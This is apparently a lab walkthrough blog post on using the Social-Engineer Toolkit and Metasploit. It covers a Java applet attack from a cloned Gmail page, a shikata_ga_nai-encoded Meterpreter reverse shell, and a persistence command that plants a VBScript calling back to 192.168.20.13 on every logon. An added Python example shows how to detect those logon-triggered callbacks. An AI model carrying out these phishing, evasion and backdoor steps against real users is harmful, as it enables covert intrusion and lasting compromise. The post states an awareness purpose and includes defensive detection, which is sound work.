Choose 1 for Social-Engineering Attacks.
Choose 2 for Website Attack Vectors.
Choose 1 for Java Applet Attack Method.
Choose 1 for Web Templates.
Choose 2 for Gmail.
Choose 2 for Windows Reverse_TCP Meterpreter as the stager.
Choose 2 for shikata_ga_nai encoding for AV detection evasion. Metasploit encodes the payload 4 times to avoid AV detection; the target machine in this lab has no AV, so encoding is not necessary here.
The payload is encoded 4 times; however, this number of iterations is far from enough, and AV can still detect the payload easily. SET makes interoperating with Metasploit really easy.
The cloned web server is ready to accept connections from any victim.
In the past I used to click on unknown Java popups, as I did not know the implications of clicking them blindly. However, if the victim is not cautious and clicks on this unknown Java applet, the payload will be uploaded to the victim's machine.
This is what happens on the attacker's machine if the unknown Java applet is clicked by the victim: 2 Meterpreter sessions are created.
sessions -l lists the available Meterpreter sessions.
The sessions -i option is to interact with the chosen Meterpreter session.
If the attacker wishes, a cmd.exe can be spawned as a hidden process.
Creating a persistent backdoor
You can choose where you want to plant the backdoor, when you want the backdoor to start, and which address it should connect to.
run persistence -A -L c:\Users\cyrus\Downloads -U -p 443 -r 192.168.20.13
This command instructs that the backdoor VBScript be uploaded to c:\Users\cyrus\Downloads and activated once the user logs in; the VBScript will connect back to 192.168.20.13 on TCP port 443.
This is the VBScript uploaded to the victim's machine from the attacker's machine via the Meterpreter session.
All Meterpreter sessions were lost because the victim had rebooted his machine.
Meterpreter session 4 is created after the user has logged in.
The attacker spawned a cmd.exe on the victim's machine.
Modern antivirus programs are capable of detecting such a backdoor and even preventing the download of the encoded payload onto the victim's machine; a payload encoded by shikata_ga_nai 4 times is not enough to evade most modern antivirus programs.
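The behaviour shown in the last few screenshots, a callback to the same address and port a few seconds after every user logon, is exactly the pattern a defender can look for. The following is an added detection example; it is not part of the original post and not SET or Metasploit code. The log format (one line per event with key=value fields), the host name WIN7-LAB, the timestamps and the script-host process name wscript.exe are all constructed for the example; the callback address 192.168.20.13 and port 443 are the ones used in the lab above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from the original post): each logon on the lab
# host is followed within seconds by an outbound connection to the persistence
# script's callback address and port. The later browser connection is normal
# traffic and must not be flagged.
SAMPLE_LOG = """\
2014-05-01T08:00:01 host=WIN7-LAB event=logon user=cyrus
2014-05-01T08:00:04 host=WIN7-LAB event=netconn proc=wscript.exe dst=192.168.20.13 dport=443
2014-05-01T08:05:12 host=WIN7-LAB event=netconn proc=firefox.exe dst=93.184.216.34 dport=443
2014-05-01T09:30:00 host=WIN7-LAB event=logon user=cyrus
2014-05-01T09:30:03 host=WIN7-LAB event=netconn proc=wscript.exe dst=192.168.20.13 dport=443
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<event>\S+)(?P<rest>.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Parse one constructed log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = {
        "ts": datetime.fromisoformat(m.group("ts")),
        "host": m.group("host"),
        "event": m.group("event"),
    }
    # Remaining key=value pairs (user=, proc=, dst=, dport=) are kept as strings.
    rec.update(dict(KV_RE.findall(m.group("rest"))))
    return rec


def find_logon_triggered_callbacks(log_text, window_seconds=30, min_logons=2):
    """Return (host, dst, dport) tuples that received an outbound connection within
    window_seconds after at least min_logons distinct logons on that host, mapped to
    the sorted logon timestamps that triggered them. A destination contacted right
    after a single logon is ignored; the repeat-on-every-logon pattern is the signal."""
    records = [r for r in (parse_line(line) for line in log_text.splitlines()) if r]
    records.sort(key=lambda r: r["ts"])
    window = timedelta(seconds=window_seconds)
    hits = defaultdict(set)  # (host, dst, dport) -> set of logon timestamps

    for logon in (r for r in records if r["event"] == "logon"):
        for conn in records:
            if conn["event"] != "netconn" or conn["host"] != logon["host"]:
                continue
            if logon["ts"] <= conn["ts"] <= logon["ts"] + window:
                hits[(conn["host"], conn["dst"], conn["dport"])].add(logon["ts"])

    return {key: sorted(ts) for key, ts in hits.items() if len(ts) >= min_logons}


if __name__ == "__main__":
    for (host, dst, dport), logons in find_logon_triggered_callbacks(SAMPLE_LOG).items():
        print(f"{host}: callback to {dst}:{dport} after {len(logons)} logons "
              f"({', '.join(t.isoformat() for t in logons)})")
```

On the constructed log this reports the single lab callback (192.168.20.13:443) as triggered by both logons, while the browser connection to an unrelated address on the same port is not reported because it falls outside the 30-second window. In a real environment the same correlation can be run over logon audit events and firewall or EDR network-connection records, and the destination list can be fed into host investigation of the user's Downloads folder, where this lab planted the script.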
In the past I used to click on and execute unknown Java applets without knowing the implications. This post is a simple and straightforward lab demonstration to create awareness among people who do not understand the implications of their actions when they click on something they do not understand.